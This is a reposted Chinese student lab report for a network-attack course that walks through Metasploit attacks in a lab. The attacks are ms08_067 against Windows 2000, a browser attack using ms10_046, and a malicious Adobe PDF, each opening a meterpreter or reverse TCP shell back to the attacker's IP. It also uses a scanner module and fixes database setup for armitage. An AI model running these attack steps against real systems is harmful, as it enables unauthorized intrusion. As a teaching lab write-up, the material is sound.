当前位置:   article > 正文

2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用

connected to msf. connection type: postgresql.

2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用

目录

一、基础问题回答和实验内容

1.基础问题回答

用自己的话解释什么是exploit,payload,encode.

exploit:漏洞攻击,一个exploit程序肯定会触发系统的一个或多个漏洞,进而程序直接获取到目标系统的部分或所有权限。

payload:搞破坏的关键代码。

encode:保证payload不出现特定字符,避免被查杀。

实验内容

  • 任务一:一个主动攻击实践,如ms08_067。

  • 任务二: 一个针对浏览器的攻击,如ms11_050。

  • 任务三: 一个针对客户端的攻击,如Adobe。

  • 任务四: 成功应用任何一个辅助模块。

返回目录

二、攻击实例

1.主动攻击实践,实现ms08_067

靶机:Microsoft Windows 2000(192.168.1.218)
payload : generic/shell_reverse_tcp

实验步骤
  • ==首先要把靶机和攻击者的连接方式都改为桥接!!==

  • 输入msfconsole打开metasploit控制台
  • 输入use exploit/windows/smb/ms08_067_netapi 使用ms08_067漏洞攻击方式
  • 输入set payload generic/shell_reverse_tcp以shell反向tcp连接为有效载荷
  • 输入set RHOST 192.168.1.218ip为靶机的IP
  • 输入set LHOST 192.168.1.182ip为攻击者的IP
  • 输入set target 0设置目标,0为无差别攻击
  • 输入exploit开始攻击

1042924-20190420183549315-702146240.png

返回目录

攻击浏览器实践,ms10_046漏洞攻击

靶机:Microsoft Windows XP SP3(English)
payload : windows/meterpreter/reverse_tcp

实验步骤
  • 输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用浏览器漏洞
  • 输入set payload windows/meterpreter/reverse_tcp 选择反向链接载荷
  • 输入set SRVHOST 192.168.1.182设置服务器IP(攻击者IP)
  • 输入set LHOST 192.168.1.182设置攻击者IP
  • 输入exploit开始攻击

1042924-20190420183533382-2117186939.png

  • 在win xp sp3的浏览器中访问刚刚设置的服务器IPhttp://192.168.1.182弹出如下窗口

1042924-20190420183354166-1964702889.png

  • 同时攻击者会开始监听并与靶机建立连接。

1042924-20190420183339209-1764029521.png

  • 输入sessions查看有多少主机被反向链接到攻击者和靶机对应的序号。

  • 输入sessions -i 2控制靶机(-i后面的数即为靶机对应的序号)

1042924-20190420183313817-1265656711.png

返回目录

攻击客户端实践,实现Adobe

靶机:Windows XP sp3(192.168.1.139)

实验步骤
  • 输入use windows/fileformat/adobe_cooltype_sing使用漏洞
  • 输入set payload windows/meterpreter/reverse_tcp选择攻击载荷
  • 输入set LHOST 192.168.1.182 为攻击者IP
  • 输入set FILENAME 20165209.pdf设置生成pdf文件的文件名
  • 输入exploit 开始攻击

1042924-20190420183258966-193962881.png

  • 将生成的20165209.pdf复制到Windows XP中
  • 输入back退出当前模块
  • 输入use exploit/multi/handler 进入监听模块
  • 输入set payload windows/meterpreter/reverse_tcp选择攻击载荷
  • 输入set LHOST 192.168.1.182为攻击者IP
  • 输入exploit开始攻击
  • 在靶机中打开20165209.pdf,攻击成功

1042924-20190420184106939-394155066.png

返回目录

成功攻击一个辅助模块,实现网段扫描(唯一)

靶机:

实验步骤
  • 输入show auxiliary查看所有的辅助模块
  • 输入info scanner/steam/server_info查看模块信息,请求从服务器获取信息,扫描范围默认为10(从起始地址开始往后扫10个),端口固定为UDP端口27015。端口27015只是用作输入/输出的通信端口。

1042924-20190420183214670-76479606.png

  • 输入use scanner/steam/server_info使用漏洞
  • 输入set RHOSTS 192.168.1.180为起始IP
  • 输入exploit开始攻击
    (果不其然,这个网段里木有服务器,sang~)

1042924-20190420183159683-1141709246.png

返回目录

三、实验中遇到的问题及解决方案
1.armitage无法开启,出现错误提示如下图

1042924-20190420183132022-169488427.png

  • 参考了一篇博客里面解释了很多,具体的操作如下

1 输入 /etc/init.d/postgresql start 启动postgresql数据库;
2 输入 msfdb init 初始化MSF数据库(关键步骤);
3 输入 msfconsole 运行msfconsole;
4 输入 db_status 在msf中查看数据库连接状态。

  • 在显示Connected to msf. Connection type: postgresql.之后,再次输入armitage即可开启成功。

返回目录

四、实验总结
1.实验总结与体会

实验最痛苦的就是明明和大家做的一样,但是我的就是无法攻击成功。通过实验掌握了msf的简单操作,始终牢记不懂就help,不知道是干什么的就info,看不懂就有道的宗旨,还是有些收获的,有些快乐。

2.离实战还缺些什么技术

觉得差的也不多,也就一个大神的距离吧。通过在网络上捕包反查IP,并且攻击。类似这种步骤中的功能,我目前只能在已知的情况下,进行强迫式攻击(就是硬生生让舍友拷一下)。

返回目录

转载于:https://www.cnblogs.com/tutu233/p/10742078.html

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Gausst松鼠会/article/detail/69835
推荐阅读
相关标签
  

闽ICP备14008679号